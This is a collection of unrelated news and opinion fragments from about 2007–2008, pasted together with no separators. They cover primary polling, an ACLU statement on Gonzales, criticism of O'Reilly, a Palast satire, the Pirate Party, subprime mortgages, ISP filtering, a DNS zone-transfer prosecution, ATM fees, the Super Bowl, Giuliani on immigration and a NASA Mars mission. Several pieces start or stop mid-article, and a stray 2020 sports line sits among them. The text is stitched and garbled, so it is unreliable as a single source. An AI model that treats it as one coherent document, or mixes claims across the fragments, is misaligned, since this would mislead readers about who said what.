As in Iowa , he 's advanced particularly among evangelical white Protestants , jumped from 13 percent support last month to a field - leading 29 percent support now .
The main loss among evangelicals was McCain 's , from 23 percent down to 12 percent .
It matters : Evangelicals account for 31 percent of all Republicans and Republican leaners , and 37 percent of likely Republican primary voters .
RELIGION : Romney , for his part , has gained seven points overall among registered voters , though less ( a slight four points ) among likely voters .
Better is his progress on the issue of his religion , which he addressed in a speech last week :
While 21 percent of leaned Republicans say they 're less likely to vote for someone who 's a Mormon , that 's down from 30 percent in June and 36 percent a year ago .
These judgments matter ; Romney has 20 percent support from Republicans who say Mormonism makes no difference in their choice , running second to Giuliani in this group versus almost no support among those less apt to back a Mormon candidate .
By contrast , this poll finds no net negative effect of a candidate 's being a woman , an African - American , or a minister or other religious leader .
Romney may face further questions about his religion .
Most Americans , 57 percent , believe they do n't have a " good basic understanding " of it .
And just 42 percent view Mormonism favorably overall ; about as many , 39 percent , see it unfavorably , while 19 percent have no opinion .
Romney 's support is far higher , 28 percent versus 6 percent , among people who have a favorable opinion of his religion .
Religion is likely to continue to play a fascinating role in the race .
Among all Americans just 27 percent say a political leader should rely on his or her religious beliefs in making policy decisions , a new low in ABC / Post polling and potentially a challenge for Huckabee or Romney in a general election contest .
At the same time , in his race for the nomination , Huckabee has 21 percent support among leaned Republicans who say a candidate should rely on his religious beliefs in making policy decisions .
Among those who oppose reliance on religious belief in policy matters , Huckabee 's support drops to 10 percent .
GOP ATTRIBUTES /ISSUES : Giuliani , whatever his problems , continues to prevail on two important attributes :
He 's easily seen as the most electable in November ( with nearly a 3 - 1 lead over Romney , the No. 2 finisher on this attribute ) , and as the strongest leader ( 2 - 1 over McCain ) .
Giuliani also has a scant five - point edge over McCain and Huckabee as the candidate who " best understands the problems of people like you . "
But he 's only even with McCain in terms of experience ; there 's virtually a four - way tie among these four top candidates on who 's the most honest and trustworthy , and all five top candidates , also including Thompson , are in the mix on who best represents the core values of the Republican Party .
On issues , Giuliani leads in trust to handle terrorism , a cornerstone of his campaign , and has an advantage on economic issues , potentially useful as this concern grows .
But he and McCain are about even in trust to handle Iraq and immigration , and he , Romney and Huckabee , are about matched on " social issues , such as abortion and gay civil unions . "
DEMOCRATS :
This poll finds more clear - cut preferences on the Democratic side , where the contest looks very much now as it has since September .
Clinton 's overall lead is buttressed by very large advantages as the best experienced candidate , the strongest leader and the most electable in a general election .
She also has a significant lead on empathy , wider than when that attribute was last tested in June .
Clinton has a much narrower eight - point advantage on honesty and trustworthiness , long a weaker suit for her .
And Obama runs evenly with her in one last attribute , being the " most inspiring " candidate .
On issues , again , Clinton prevails with very large leads in trust to handle health care , the economy , Iraq and terrorism alike .
While Clinton leads among both sexes , she again has a bigger advantage among women than men .
Indeed , she leads in this poll across demographic groups , including a 13 - point advantage among African - Americans , who 've been oversampled in ABC / Post polls all year for more reliable analysis .
ISSUES :
There is , again , a significant difference between leaned Democrats and leaned Republicans when it comes to the top issues in their vote ; Democrats converge around three issues -- the economy , Iraq and health care -- while Republicans bring in terrorism and immigration as well .
But among both groups there 's been a drop in mentions of Iraq as the top issue , and increases in concern about the economy , a looming wildcard in the 2008 election .
METHODOLOGY : This ABC News / Washington Post poll was conducted by telephone Dec. 6 - 9 , 2007 , among a random national sample of 1,136 adults , including an oversample of African - Americans for a total of 205 black respondents ( weighted back to their correct share of the national population ) .
The results have a three - point error margin for the full sample , four points for the sample of 610 Democrats and Democratic - leaning independents , five points for the sample of 409 Republicans and Republican - leaning independents , 4.5 points for the sample of 429 likely Democratic primary voters and 5.5 points for the sample of 293 likely Republican primary voters .
Sampling , data collection and tabulation by TNS of Horsham , Pa .
FOR IMMEDIATE RELEASE
Contact : media@dcaclu.org
WASHINGTON – The American Civil Liberties Union today said U.S. Attorney General Alberto Gonzales ’ resignation requires further congressional investigation into the Bush administration ’s systematic abuse of power .
“ Alberto Gonzales will follow Mitchell Palmer as one of the worst attorneys general in U.S. history , ” said Anthony D. Romero , ACLU Executive Director .
“ But Gonzales ’ resignation does n’t put an end to the widespread abuse of executive powers .
The White House may claim that Gonzales ’ resignation restores the rule of law , but if anything , his departure highlights the need for increased scrutiny and accountability . ”
As a matter of policy , the ACLU neither opposes nor endorses political appointees .
However , even before becoming attorney general , then - White House Counsel Alberto Gonzales already demonstrated hostility to civil liberties .
In January 2005 , the ACLU expressed serious concerns about his independence and reported on his civil liberties record :
He disparaged the Geneva Conventions as “ quaint ” and “ obsolete ” and developed legal arguments that permitted aggressive interrogation tactics in the months after 9/11 , which deny detainees in the war on terror basic legal protections .
His staff created the system by which the president could move American citizens from the criminal justice system into detention as enemy combatants , eliminating due process protections .
He championed the military tribunal system for detainees in the war on terror that omits due process protections granted by the Uniform Code of Military Justice .
He drafted the infamous Texas clemency memos for then - Governor Bush , which failed to mention key factors in each case , including evidence of innocence that supported clemency for death row inmates .
During his tenure as attorney general , Gonzales championed policies that eroded civil liberties protections .
Among them .
He failed to investigate and prosecute criminal acts committed by civilians in the torture or abuse of detainees and repeatedly rebuffed congressional inquiries into the matter .
He failed to investigate and prosecute criminal acts and violations of laws as a result of the National Security Agency ’s warrantless spying program .
Recent reports indicate that Gonzales may have recommended to the president that he block the Office of Professional Responsibility ’s investigation since he himself may have come under scrutiny .
He championed renewal of the Patriot Act despite serous civil liberties concerns from Republicans and Democrats alike .
A recent audit by the Justice Department ’s Office of the Inspector General found that the FBI underreported , misused and abused the National Security Letter authority .
He failed to investigate possible perjury committed by Lt. Gen. Ricardo Sanchez before the Senate Armed Services Committee .
A memo drafted by General Sanchez , who commanded the war in Iraq , laid out specific interrogation techniques including sleep management , the inducement of fear at two levels of severity , loud music and sensory agitation , and the use of canine units to exploit fear of dogs .
During sworn testimony before Congress , General Sanchez flatly denied approving any such techniques .
He used Section 218 of the Patriot Act to sidestep the Fourth Amendment by using foreign intelligence as a significant purpose to justify searches .
The investigation of Brandon Mayfield demonstrates how the Foreign Intelligence Surveillance Act was used to circumvent the Constitution .
The FBI arrested Mayfield as a material witness in connection with the Madrid train bombing and held him for more than two weeks before releasing him .
Mayfield was never charged , and an FBI internal review later acknowledged serious errors in its investigation .
His department reversed findings of a team of government voting rights lawyers and analysts that concluded a Georgia voter identification law would discriminate against minorities .
His department attempted to bury an unfavorable report on racial profiling compiled by the Bureau of Justice Statistics .
He failed to demonstrate necessary independence from the White House and President Bush , as evidenced in the recent scandal involving the dismissal of U.S. Attorneys .
Under Gonzales ’ tenure , experienced attorneys in the Civil Rights Division of the Justice Department were forced out or replaced by less experienced , politically loyal staff .
“ This man , who swore to uphold the Constitution , instead flouted it , and consistently put partisan political considerations over the rule of law , ” said Caroline Fredrickson , Director of the ACLU Washington Legislative Office .
“ He twisted our Constitution and created a legal framework that paved the way for tremendous and growing abuses of power by the executive branch .
He spied on Americans , attempted to justify torture , and worked to strip away our most sacred rights and freedoms – all to further the president ’s political agenda .
Congress must not accept Gonzales as the administration ’s latest sacrificial lamb .
Congress must conduct more oversight and restore our Constitution , our world status and American values . ”
The ACLU ’s January 2005 report on Gonzales ’ civil liberties record is available at : www.aclu.org/gonzales
Download Download
Why does O'Reilly use the Pope so -- oh , why ?
Has he no decency ?
Has he no shame ?
Has he .... Sorry , I got carried away ... Bill O'Reilly attacks the LA Times because they printed an op - ed called " Teaching the Pope . "
In it they ask Pope Benedict XVI to not be influenced by hardliners : " He would be wiser to listen to other Catholics , laypeople as well as clergy , who know what mischief would be caused by a decree that would seem to force some Catholic officials to choose between their responsibility to their constituents or the Constitution and their standing in the church denied communion because of their views on abortion . "
Sounds reasonable , right ?
Not for BillO .
O'Reilly : The LA Times writes an editorial lecturing the Pope to stay away from Conservative Catholics hardliners , ummm and give communion to people who are pro-choice .
They 're actually telling the leader of the Catholic Church who to give the sacraments to .
I mean , talk about hubris ?
O'Reilly cries , " hubris ! " to the LA Times for their unthinkable position of lecturing the Pope .
It 's an op - ed that actually would benefit Rudy Giuliani this presidential cycle .
John Kerry did n't have that defense .
Funny how BillO somehow forgets when HE lectured Pope John Paul because he was against the invasion of Iraq .
But as I ’ve said before , I believe also that John Paul is naive and detached from reality .
If America does not lead an attack on Iraq , once again , Saddam remains in power and is free to use his anthrax and other terrible weapons as he chooses .
So the pope does not seem to be concerned about that or about Saddam ’s behavior in general .
Once again , he must know Saddam is a killer .
He must know he ’s oppressed his own people using murder and torture .
He must know that .
Summing up , Jacques Chirac is our enemy , and the pope , well , I do n’t know what to think .
Naive and detached from reality .
Sounds like he 's describing a crazy person .
Bill even wrote a piece in the Jewish World Review calling him a " Saddam Enabler ! "
Talk about " hubris . "
What a hypocrite , but that 's nothing new for The Factor .
It ’s getting easier to watch the watchers :
A teen suspect ’s snap decision to secretly record his interrogation with an MP3 player has resulted in a perjury case against a veteran detective and a plea deal for the teen .
Unaware of the recording , Detective Christopher Perino insisted under oath at a trial in April that suspect Erik Crespo was n’t questioned about a shooting in the Bronx .
But the defense confronted the detective with a transcript it said proved he had spent more than an hour unsuccessfully trying to persuade Crespo to confess .
Perino was arraigned today on 12 counts of first - degree perjury and freed on bail .
Here ’s your question , class :
In his State of the Union , the President asked Congress for $ 300 million for poor kids in the inner city .
As there are , officially , 15 million children in America living in poverty , how much is that per child ?
Correct ! $ 20 .
Here ’s your second question .
The President also demanded that Congress extend his tax cuts .
The cost : $ 4.3 trillion over ten years .
The big recipients are millionaires .
And the number of millionaires happens , not coincidentally , to equal the number of poor kids , roughly 15 million of them .
OK class : what is the cost of the tax cut per millionaire ?
That ’s right , Richie , $ 287,000 apiece .
Mr. Bush said , “ In neighborhoods across our country , there are boys and girls with dreams .
And a decent education is their only hope of achieving them . ”
So how much educational dreaming will $ 20 buy ?
- George Bush ’s alma mater , Phillips Andover Academy , tells us their annual tuition is $ 37,200 .
The $ 20 “ Pell Grant for Kids , ” as the White House calls it , will buy a poor kid about 35 minutes of this educational dream .
So they ’ll have to wake up quickly .
-$ 20 wo n’t cover the cost of the final book in the Harry Potter series .
If you ca n’t buy a book nor pay tuition with a sawbuck , what exactly can a poor kid buy with $ 20 in urban America ?
The Palast Investigative Team donned baseball caps and big pants and discovered we could obtain what local citizens call a “ rock ” of crack cocaine .
For $ 20 , we were guaranteed we could fulfill any kid ’s dream for at least 15 minutes .
Now we could see the incontrovertible logic in what appeared to be quixotic ravings by the President about free trade with Colombia , Pell Grant for Kids and the surge in Iraq .
In Iraq , General Petraeus tells us we must continue to feed in troops for another ten years .
There is no way the military can recruit these freedom fighters unless our lower income youth are high , hooked and desperate .
Do n’t say ,
– crack vials , ’ they ’re , – Democracy Rocks ’ !
The plan would have been clearer if Mr. Bush had kept in his speech the line from his original draft which read , “ I have ordered 30,000 additional troops to Iraq this year – and I am proud to say my military - age kids are not among them . ”
Of course , there ’s an effective alternative to Mr. Bush ’s plan – which wo n’t cost a penny more .
Simply turn it upside down .
Let ’s give each millionaire in America a $ 20 bill , and every poor child $ 287,000 .
And , there ’s an added benefit to this alternative .
Had we turned Mr. Bush and his plan upside down , he could have spoken to Congress from his heart .
- For more on Bush and education read “ No Child 's Behind Left ” in Armed Madhouse excerpted here .
- Also read Palast 's take on the 2007 State of the Union here .
*************
Greg Palast is the author of the NY Times best - sellers , Armed Madhouse and The Best Democracy Money Can Buy .
View Palast 's investigative reports for BBC Television on our YouTube Channel .
Join our social networking sites on Facebook on MySpace and on Google 's Orkut .
Sign up for RSS updates of our site and for our podcasts .
Support our work by donating to the Palast Investigative Fund ( a 501c3 educational foundation ) .
The leader of the pro-filesharing Swedish Pirate Party is co-ordinating a pan-European electoral assault for 2009's European Elections .
Rick Falvinge told OUT - LAW
Radio that it would be the first ever political platform that stretched across Europe .
Sweden is the home of the Pirate Party , but examples have since sprung up all over Europe .
It is these which Falvinge hopes to unite in time for elections to the European Parliament in June 2009 .
" We are investigating the possibility of running as the first major pan-European party with a common platform across all countries , " said Falvinge .
" We are seeing this as the next logical step that we should run on a common platform throughout Europe so that if you look at the French Pirate Party or the Spanish Pirate Party they should have the same programme as the Swedish Pirate Party when we run for the common parliament . "
Falvinge said the German and Austrian parties were already on board and that discussions were ongoing with others .
There are Pirate Parties in Spain , France , Poland , Italy and Belgium .
The movement began in Sweden on 1 January this year , but was given a major boost when an associated unauthorised download links site , Pirate Bay , was raided by Swedish police .
There was public outcry which only worsened when it emerged that the US administration had put pressure on Sweden to act against Pirate Bay .
The movement mushroomed and its international expansion grew from there .
Falvinge , speaking to OUT - LAW 's weekly podcast , said the party stands for far more than simply legalising file sharing .
" That we are pro-filesharing is a consequence of us being pro-civil liberties , " said Falvinge .
" We are pro-civil liberties for the exact same reason that the entertainment industry is against civil liberties , because they have a bottom line to protect .
" The entertainment industry is what drives today 's witch hunt on civil liberties , " he said .
" DRM technologies is the large media cartels ' way of writing their own laws to circumvent copyright laws and we do have an elected parliament to write such laws . "
Falvinge claims that despite the disappointing result , his party has had some policy victories in Sweden .
" We have seriously influenced the debate here in Sweden , " he said .
" All of the established parties who won have shifted feet on their stance towards the file sharing and copyright regime . "
Hear the interview at OUT - LAW Radio
Copyright © 2006 , OUT - LAW.com
OUT -LAW.COM is part of international law firm Pinsent Masons .
One consequence is an upending of the traditional pattern , in which middle - aged children take in an elderly parent .
As $ 15 - an - hour factory jobs are replaced by $ 7 - or $ 8 - an - hour retail jobs , more men in their 30s and 40s are moving in with their parents or grandparents , said Cheryl Thiessen , the director of Jackson / Vinton Community Action , which runs medical , fuel and other aid programs in Jackson and Vinton Counties .
Other unemployed or low - wage workers , some with families , find themselves staying with one relative after another , Ms. Thiessen said , serially wearing out their welcome .
“ A lot of major employers have left , and the town is drying up , ” Ms. Thiessen said of Jackson .
“ We ’re starting to lose small shops , too  Hallmark , the jewelry and shoe stores , the movie theater and most of the grocery stores . ”
Shari Joos , 45 , a married mother of four boys in nearby Wellston , said , “ If you do n’t work at Wal - Mart , the only job you can get around here is in fast food . ”
Between her husband ’s factory job and her intermittent work , they made $ 30,000 a year in the best of times , Mrs. Joos said .
Since last fall , when her husband was laid off by the Merillat cabinet factory , which downsized to one shift a day from three , keeping anywhere near that income required Mrs.
Joos to take a second job .
She works at a school cafeteria each weekday from 9:30 a.m. to 1 p.m and then drives to Wal - Mart , where she relaxes in her car before starting her 2 - to - 10 p.m. shift at the deli counter .
Her 20 - year - old son went to college for two years , earning an associate degree in information science , but cannot find any jobs nearby .
He still works at McDonald ’s and lives at home as he ponders whether to move to a distant city , as most local college graduates must .
Her 22 - year - old son works at Burger King and lives with his grandparents  “ that was his way of moving out , ” Mrs. Joos said .
“ The liars win . ”
That ’s how Glenn Mueller , a professor at the Burns School of Real Estate and Construction Management at the University of Denver , sees the Bush administration plan to clean up the subprime - mortgage mess .
“ They were actually called ‘ liar loans , ’ ” he said .
“ And now , the liars have won . ”
Foreclosures have so ravaged the nation that Treasury Secretary Henry Paulson pulled together the biggest players in the mortgage industry .
He got them to extend their teaser rates on certain sub prime loans for up to five years .
“ Just a few years ago , the government was encouraging lenders to make loans to borrowers with poor credit , ” said Wil Armstrong , an owner of Cherry Creek Mortgage and a Republican candidate for Colorado ’s open 6th Congressional District seat .
“ Now , they are saying we do n’t want you to make those kind of loans anymore ?
When the government intervenes , it typically makes matters worse . ”
Bush claims his move does not constitute federal intervention into the allegedly free market that his administration pretends to cherish and champion .
It ’s just a “ voluntary ” deal to help out a few folks .
Peter Schiff , a private money manager in Darien , Conn. , who has been predicting this looming crisis for years , put it best :
“ The authorities point out that if their ‘ suggestions ’ are not adopted by lenders , much more draconian legislation will surely follow .
Let freedom ring ! ”
Oh , say , can you see ?
Our economy must be nearing a total collapse if a Republican administration is meddling with private capital .
Either that , or there ’s another election year coming up .
Hillary Clinton wants to crack down even harder — putting a moratorium on foreclosures .
A bunch of liars bought homes ; now they ca n’t pay their bills , so the solution is to protect them ?
I talked to a guy named Michael Sichenzia , who spent four years in prison for mortgage fraud in New York .
He claims that in many cases , the liars were n’t the homebuyers but the brokers who filled out the loan applications for them .
He says he got in trouble because he did it himself .
A borrower would submit tax returns and income statements , and he ’d see that the application was not so much true but accepted .
He says it was a widespread practice — he was just a guy who got caught .
Misery goes global
Today , Sichenzia is making amends as the lead investigator for a Deerfield Beach , Fla. , law firm .
He spends much of his time investigating applications on bad loans .
“ I can find 11 felonies on every loan that I ( examine ) , ” he said .
As brokers , appraisers , lenders and others committed blatant fraud , Wall Street turned a blind eye .
It bought the loans , packaged them in bundles and sold them to investors around the world .
Sichenzia said he was recently interviewed by a newspaper in Norway .
It seems some Norwegian municipalities made the mistake of investing in some American mortgage - backed securities .
“ Now they ca n’t meet payroll or keep the lights on in city hall in the dead of the Norwegian winter , ” Sichenzia said .
Instead of bailing out borrowers and lenders , how about simply enforcing the laws ?
How about prosecuting everyone from the heads of Wall Street ’s banks down to the hustling brokers and appraisers ?
Nah , that ’s too messy .
So now the nation ’s foreclosure rate is back to where it was during the savings - and - loan crisis 20 years ago .
Longtime Boulder mortgage banker Lou Barnes said Bush ’s plan is just a start .
He predicts massive government bailouts of lenders , investors and borrowers .
Credit markets are frozen , he said , and Bush knows it wo n’t be long before this ice spreads throughout the economy .
“ The endgame of a credit crisis — if untended — is the 1930s , ” Barnes said .
“ Grown - ups have to look past blame and punishment and look to preserving society .
When the marketplace breaks , it ’s the proper role of government to put it back together . ”
Perhaps Barnes is right .
But are n’t they still busy trying to put New Orleans back together ?
Al Lewis ’ column appears Sundays , Tuesdays and Fridays .
Respond to him at denverpostbloghouse.com/lewis , 303-954-1967 or alewis@denverpost.com .
When we dubbed 2008 the " Year of Filters " two weeks ago , someone at the IFPI must have been reading .
The worldwide music trade group has just released its 2008 report on digital music , and it opens by talking about the " sea change " that is sweeping the globe .
No , it 's not digital music , it 's ISP filtering .
According to the IFPI , " 2007 was the year ISP responsibility started to become an accepted principle .
2008 must be the year it become [ sic ] reality . "
If you do n't smell a coordinated , worldwide campaign to prod ISPs to board the Filter Express , it 's time to haul yourself to an otolaryngologist .
The campaign has been in progress for some time .
Here in the US , the MPAA has been banging on the filtering drum for some time with its argument that content filtering is actually in ISPs ' best interests .
One the one hand , this is true ( filtering can reduce peak traffic loads from P2P software ) , but it's an argument that fails to acknowledge just how much work ISPs have done at all levels of government to make sure that they are a " dumb pipe " to the Internet .
Bills like the US DMCA granted ISPs immunity for the content that travels over their networks , but that immunity could be lost if ISPs start filtering .
The MPAA did score a huge win in 2007 as AT&T publicly committed to implementing some sort of filtering scheme across its network , but it has n't yet managed to get most universities and colleges to do the same thing ( either voluntarily or through government regulation ) .
It has tried — in some cases using data that was inflated to three times the actual level — but so far has had limited success .
The ultimate prize would be a government mandate for filtering of the kind now facing ISPs in France .
French President Nicolas Sarkozy supervised a " memorandum of understanding " between the government , ISPs , and content owners last year that achieves modest consumer gains but requires ISPs to disconnect repeat copyright infringers .
The IFPI 's new report says that the " Sarkozy plan leads the way , " and the group clearly intends to push for this model to be replicated elsewhere ( something similar was also mentioned as a possibility in the UK's Gowers Report from 2006 ) .
Despite 40 percent worldwide growth in digital sales , IFPI claims that the ratio of unlicensed tracks to legal downloads is still about 20 to one .
These illicit downloads are said to be the cause of lower sales , though one study cited by the IFPI shows that P2P downloading did n't affect the buying habits of 64 percent of consumers and actually led 6 percent of file - swappers to buy more music .
The other 30 percent did say that they purchased less music after grabbing their songs for free , but this is only a minority of P2P users .
In fact , the IFPI 's own numbers show that in the US , for instance , 17.6 percent of all Internet users regularly share files .
If 30 percent of those users buy less music , that means that file - swapping only leads 5.9 percent of all US Internet users to buy less music .
The number is even lower if we take the US population as a whole .
Forgive us if we 're skeptical here , but implementing a draconian solution like deep packet inspection of all Internet traffic in order to get a few percent of the population to buy more music does n't sound much like progress , or even rationality .
In any event , that 's not the way the IFPI sees it .
Despite the growth of digital ( in South Korea , online sales have even overtaken physical sales ) , the IFPI says that " the time for action is now , " because " revolution and innovation are not going to be enough to secure a healthy future for the music industry . "
Fortunately , " revolution and innovation " are actually words that can be applied to the music business now , and the IFPI report rightly cites the explosion of interesting new formats and business models for music .
Apart from the well - known download services like iTunes , Amazon , and eMusic , subscription services like Napster , Rhapsody , and the Zune Pass offer unlimited music for a monthly fee .
Ad - supported music from sites like Imeem and Last .fm makes it easy to explore new tunes legally , while models like Nokia 's " Comes With Music " are baking the cost of a music subscription into a consumer electronics device .
In addition , musicians are selling directly to fans and even allowing people to set their own prices .
So in many senses , 2008 looks like a bright year for music , but the heavy - handed emphasis on filtering as the One True Answer gives us pause .
After all , once ISPs around the world have filtering technology installed and a mandate to use it , it 's only a matter of time before they are asked to look for other sorts of crime and defend other sorts of industries .
... WAY wrong .
This is just mind blowing .
Ever been prosecuted for tracking spam ?
Running a traceroute ?
Doing a zone transfer ?
Asking a public internet server for public information that it is configured to provide upon demand ?
No ?
Well , David Ritz has .
And amazingly , he lost the case .
Here are just a few of the gems that the court has the audacity to call " conclusions of law . "
Read them while you go donate to David 's legal defense fund .
He got screwed here , folks , and needs your help .
" Ritz 's behavior in conducting a zone transfer was unauthorized within the meaning of the North Dakota Computer Crime Law . "
You might not know what a zone transfer is , but I do .
It 's asking a DNS server for all the particular public info it provides about a given domain .
This is a common task performed by system administrators for many purposes .
The judge is saying that DNS zone transfers are now illegal in North Dakota .
" The Court rejects the test for " authorization " articulated by defendant 's expert , Lawrence Baldwin .
To find all access " authorized " which is successful would essentially turn the computer crime laws of this country upside down . "
That 's untrue .
The judge is trying to hang David out to dry , even when provided evidence of what actually constitutes hacking or cracking .
Accessing a server on the public internet that is set up to provide that public info is not a crime , and saying that it is not a crime does n't suddenly damage computer crime law .
The judge just amended the definition of " unauthorized " to include public internet servers that were expressly configured to provide info to anybody who asks for that info .
" Ritz has engaged in a variety of activities without authorization on the Internet .
Those activities include port scanning , hijacking computers , and the compilation and publication of Whois lookups without authorization from Network Solutions . "
I 'm not touching the " hijacking computers " statement — who knows what the judge means , and I do n't think it 's wise to assume that the judge 's definition matches the common one .
But what really jumps out here is this : Publication of WHOIS information .
You know , business records .
Who owns a domain .
Public information .
The judge has arbitrarily decided that it is illegal to take information from WHOIS data — necessary information when compiling a report on a company or activity , to make sure you 're talking about the right person — and put it in a spam report or on a website .
Mickey Chandler calls the court documents in this case " 12 pages of bad law , " and I could n't agree more .
$ 3 ATM Fees ?
Banks Increase the Price of Your Money Struggling financial instutions looking for more ways to raise profits .
Jan. 27 , 2008  --
Consumers who rely on ATMs for quick cash access may find that getting their money actually costs them more as banks raise their ATM fees .
The financial institutions , which already generate $ 10 billion a year in revenue from what they charge people for accessing their accounts from other banks '
ATMs , have increased the fees in response to a poorer economy .
One expert said banks are relying on consumers to get them through the weak economic time .
" They 're looking for ways to make up for the losses and nickel and diming appears to be the only way they can do it , " Consumer Affairs analyst Joseph Enoch said .
Today , the average ATM fee is $ 1.78 , while five years ago it cost a little more than a $ 1 to retrieve money from a bank with which you did n't have an account .
In some areas , JP Morgan Chase , Bank of America and Wachovia fees have hit $ 3 for non-customers .
Chase released a statement saying it , " created a network of 9,100 ATMs for the convenience and free use by our customers .
It is appropriate to charge non-customers a fee . "
It 's not just people banking outside their network who have seen an increase in prices .
Some banks now charge their own customers a fee for the convenience of using an ATM to the disdain of some .
" I do n't think it 's fair — that in order to hopefully fix things — that it 's one and a half times what you used to spend at the ATM , " one man said .
The fees also have helped banks cope with the housing slump and growing number of bad loans , which may never be paid off .
" As long as the market keeps tanking and the foreclosures become a larger problem , which it is going to in the next year , then they 're going to have to make money somehow and this is probably their only route , " Enoch said .
Some banks insist there 's no link between the economy and the hikes .
They say the increase is an attempt to offset the big cost of convenience .
A decade ago there were 140,000 ATMs , while today there are 400,000 nationwide .
Analysts believe ATM fees will continue rising and insufficient fund penalties along with late credit card payments will be the next targets for banks .
CHANDLER , Ariz . – Before ever setting foot here in the Valley of the Sun , Plaxico Burress let The Post – and thus the world – in on his prediction for who wins Super Bowl XVII .
It sure ai n’t the Patriots .
As he pulled his car up to the Giants Stadium tunnel to unload his bags , Burress yesterday morning was asked by The Post a direct question :
Are you ready to make history ?
“ You better believe it , ” the towering Giants receiver said .
And then , as he entered the stadium and turned left toward the Giants locker room , Burress was asked for his prediction .
Burress never hesitated , flatly stating “ 23 - 17 . ”
He did n’t identify the winning team .
He did n’t have to .
Next came Michael Strahan , unloading his bags as The Post looked on .
The same question :
Are you ready to make history ?
“ Yes sir , ” said Strahan , who for 15 years has chased the dream of winning the Super Bowl .
“ History will be ours . ”
With that , the Giants departed for their western excursion , intent on proving wrong their many doubters and the oddsmakers and the legion of New England fans who believe their undefeated ( 18 -0 ) Patriots are unbeatable and that a fourth Super Bowl title in the past seven years is their birthright .
Although their charter flight took off nearly 45 minutes late because rookie cornerback Aaron Ross got sick prior to takeoff , the Giants arrived here displaying sartorial splendor , with almost every player decked out in an all - black ensemble as per the instructions of fashion consultant / linebacker Antonio Pierce .
Out of the gate , it was the Patriots who led the way into town , touching down in Phoenix on Sunday afternoon amid a rainstorm .
Tom Coughlin preferred to keep his team home until the last possible moment and by the time their charter arrived yesterday , there were breaks in the clouds and some afternoon sunshine and welcoming blue skies managed to peek through to greet the Giants .
A sign ?
An omen ?
Were whatever fates and Muses in charge of underdogs everywhere smiling down on the Giants ?
The oddsmakers believe the Giants can give the unbeaten Patriots a game , just as long as you spot the Giants nearly two touchdowns , which means the odds say it wo n’t be much of a game at all .
“ This ai n’t no feel - good story , ” Pierce said .
“ We ’re not here to hand over the trophy to nobody .
We ’re here to hopefully take that trophy home back to New York . ”
The sendoff for the Giants back in New Jersey was an understated scene and certainly not in the same stratosphere as the grand sendoff afforded the Patriots , who on Sunday were given a heroes salute back at Gillette Stadium , with thousands of adoring fans attending celebratory rally .
The Giants exited with little fanfare .
Not more than 30 or so fans lined the fence outside the parking lot to catch a glimpse of the NFC champions .
After the flight , though , the Giants touched down and realized they were one of two teams left standing .
“ The captain announced ‘ We ’ve landed in Arizona and good luck in the Super Bowl , ’ ” Pierce said .
“ That ’s when you know we ’re here , we arrived .
I think it hit everybody once we landed and they started seeing the desert and the cactus . ”
The Giants headquarters for the week is the Sheraton Wild Horse Pass , a swanky resort located 20 miles southeast of downtown Phoenix and in close proximity to their practice home for the next five days , the Arizona Cardinals training complex .
Figure Coughlin will keep a tight leash on his club – there was no curfew last night but there will be the remainder of the week .
In his first Super Bowl as a head coach , Coughlin in his introductory press conference sounded relaxed and ready to roll .
He actually cracked up the gathering twice , first when he was asked about the secret to the Giants incredible road success ( an NFL - record 10 consecutive road victories ) .
“ We have a lot of secrets we ca n’t share with you , ” he said in perfect deadpan delivery .
Later , when asked about the large media crowd , Coughlin said :
“ This is like a normal day in New York . ”
Eli Manning , asked about Joe Namath ’s famous guarantee prior to Super Bowl III , said “ Joe Namath was a great , confident man .
That was then , this is now .
I am not going to guarantee anything . ”
No one ventured into making any predictions .
Burress already took care of that much earlier in the day .
– additional reporting from Lenn Robbins and Brian Lewis in New York
paul.schwartz@nypost.com
Just last year , I saw him passionately deliver remarks at the Manhattan Institute Hamilton Award Dinner in which he condemned the “ punitive approach ” to immigration , “ which is reflected in the House legislation that was passed , which is to make it a crime to be an illegal or undocumented immigrant . ”
To “ deal with it in a punitive way , ” he said then , “ is actually going to make us considerably less secure than we already are . ”
The better approach , he continued , is to embrace the Senate ’s comprehensive reform and to separate the criminal illegals from the hard - working ones .
These speeches are the real Rudy .
These speeches represent the Rudy who once went overboard and declared , “ If you come here and you work hard and you happen to be in an undocumented status , you ’re one of the people who we want in this city . ”
This is why Fred Siegel , a Giuliani biographer , accurately called him an “ immoderate centrist . ”
This is why Giuliani won 43 percent of the Hispanic vote in the mayoral race of 1997 .
This is why his candidacy once had the potential to renovate the G.O.P .
Of course it has n’t turned out that way .
At the moment , Giuliani and fellow moderate Mitt Romney are attacking each other for being insufficiently Tancredo - esque .
They are not renouncing the policies they championed as city and state officials , but the emphasis as they run for federal office is all in the other direction .
In effect , they are competing to drive away Hispanic votes and make the party unelectable in New Mexico , Arizona , Colorado , Nevada , Florida and the nation at large .
In this way , they are participating in the greatest blown opportunity in recent political history .
At its current nadir , the G.O.P. had been blessed with five heterodox presidential candidates who had the potential to modernize the party on a variety of fronts .
They could be competing to do that , but instead they are competing to appeal to the narrowest slice of the old guard and flatter the most rigid orthodoxies of the Beltway interest groups .
Giuliani could have opened the party to the armies of dynamism — the sort of hard - working strivers who live in Brooklyn , Queens and the Bronx ; instead he has shelved one of his core convictions .
Someday Rudy Giuliani will look back on this moment and wonder why he did n’t run as himself .
NBC Sports
It took one week for the Big 12 to bring just a little more strangeness to the year 2020 .
International Group Plans Strategy for Mars Sample Return Mission
Mars Sample Return Ascent Vehicle - Artist 's Concept
View Larger Image WASHINGTON - NASA and an international team are developing plans and seeking recommendations to launch the first Mars mission to bring soil samples back to Earth .
The ability to study soil from Mars here on Earth will contribute significantly to answering questions about the possibility of life on the Red Planet .
Returned samples also will increase understanding of the useful or harmful properties of Martian soil , which will support planning for the eventual human exploration of Mars .
A task force named the International Mars Architecture for Return of Samples , or IMARS , recently met in Washington to lay the foundation for an international collaboration to return samples from Mars .
NASA hosted the meeting .
IMARS meeting participants included representatives from more than half a dozen countries and NASA , the European Space Agency , or ESA , the Canadian Space Agency and the Japan Aerospace Exploration Agency .
IMARS is a committee of the International Mars Exploration Working Group , or IMEWG .
The group was formed in 1993 to provide a forum for the international coordination of Mars exploration missions .
" The potential paradigm - changing science from Mars samples makes this mission a high priority of the National Academy of Sciences , " said Doug McCuistion , NASA 's Mars Exploration program director , Science Mission Directorate , Washington .
" The exciting progress being made by the IMARS team is contributing directly to making this mission a reality in the next decade , All spacefaring nations have a standing invitation from IMEWG to participate in IMARS . "
Scientists reviewed past engineering work on a Mars sample return mission , international science priorities , and sample receiving facility requirements .
The IMARS team made significant progress in many of the key issues associated with the integration of science and engineering challenges .
